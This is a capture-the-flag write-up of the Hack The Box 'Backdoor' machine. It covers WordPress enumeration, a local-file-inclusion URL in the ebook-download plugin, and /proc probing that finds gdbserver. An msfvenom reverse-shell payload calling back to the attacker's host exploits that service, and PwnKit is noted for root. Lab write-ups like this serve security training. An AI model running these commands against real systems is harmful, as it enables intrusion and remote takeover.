Overall

Skills Used

  • /wp-content/plugins directory exposure
  • LFI
  • burpsuite
  • /proc

Rating

  • ⭐⭐☆☆☆☆☆☆☆☆

Recon

nmap

~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 16:53 CST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.98% done; ETC: 16:53 (0:00:08 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.94% done; ETC: 16:53 (0:00:10 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 55.23% done; ETC: 16:53 (0:00:06 remaining)
Nmap scan report for 10.10.11.125
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   398.78 ms 10.10.14.1
2   399.09 ms 10.10.11.125

Get Shell

  • Port 80 is WordPress; ran wpscan against it and found nothing useful.

  • Port 1337: unknown service.

  • wpscan --url http://10.10.11.125/ --enumerate u found the user admin.

  • wpscan --url http://10.10.11.125/ --users admin --passwords rockyou.txt did not crack the password.

  • You can list the plugins directly under /wp-content/plugins; searching for ebook-download turned up an LFI vulnerability: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/tmp/qwer

  • Next I needed to find out what service is listening on 1337. After some research: /proc/net/tcp shows which ip:port corresponds to which inode, after which you could brute-force /proc/$pid/fd/$n and use a command like file to find the fd that points at that socket, but in an LFI scenario there is no way to obtain that mapping. Alternatively, /etc/services might show whether the administrator recorded the service-to-port mapping there. Neither method works on this box.

  • In the end I used burpsuite to iterate over /proc/$pid/cmdline and view every running command line.
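As an added example (not code from the writeup), this is the local version of the /proc/net/tcp approach described above: it decodes the hex address and inode columns into listening ip:port pairs, then resolves an inode to its owning pid by reading the /proc/<pid>/fd symlinks, which is exactly the readlink step a file-content LFI cannot perform. The /proc/net/tcp sample below is constructed, not captured from the box.

```python
import os
import socket
import struct
from typing import Dict, Optional, Tuple

# Constructed sample of /proc/net/tcp (not captured from the box):
# columns are sl, local_address, rem_address, st, ..., uid, timeout, inode.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 31337 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 24601 1 0000000000000000 100 0 0 10 0
"""

def decode_addr(hex_addr: str) -> Tuple[str, int]:
    """Decode 'AABBCCDD:PPPP' from /proc/net/tcp into (dotted ip, port).
    The IPv4 part is a 32-bit integer in host byte order (little-endian on x86)."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def listening_sockets(proc_net_tcp: str) -> Dict[int, Tuple[str, int]]:
    """Map inode -> (ip, port) for every socket in LISTEN state (st == 0A)."""
    result = {}
    for line in proc_net_tcp.splitlines()[1:]:   # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] != "0A":
            continue
        result[int(fields[9])] = decode_addr(fields[1])
    return result

def owner_of_inode(inode: int, proc_root: str = "/proc") -> Optional[int]:
    """Walk /proc/<pid>/fd/* and return the pid whose fd links to socket:[inode].
    This needs readlink on the fd symlinks, which an LFI that only returns file
    contents cannot do; that is why the writeup falls back to /proc/<pid>/cmdline."""
    target = f"socket:[{inode}]"
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return int(pid)
        except (PermissionError, FileNotFoundError):
            continue   # another user's process, or one that exited mid-walk
    return None

if __name__ == "__main__":
    for inode, (ip, port) in listening_sockets(SAMPLE_PROC_NET_TCP).items():
        print(f"{ip}:{port} inode={inode} pid={owner_of_inode(inode)}")
```

On a live Linux host, replace the sample with the contents of /proc/net/tcp; the pid lookup only succeeds for processes the caller may inspect, the same restriction ss -p and netstat -p are subject to.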


  • Found that 1337 is running gdbserver.


  • Searched for a gdbserver exploit and found the gdbserver 9.2 RCE.

  • Generate the payload: msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.60 LPORT=4444 PrependFork=true -o rev.bin

  • Listen: nc -nvlp 4444

  • Exploit!

tmp$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Privilege Escalation

  • linpeas.sh
  • PwnKit

Also, the write-up at https://medium.com/@bocahganteng/write-up-backdoor-htb-c0092079ef2c notes that root appears to have a screen session open, and the user happens to have permission to attach to root's screen session.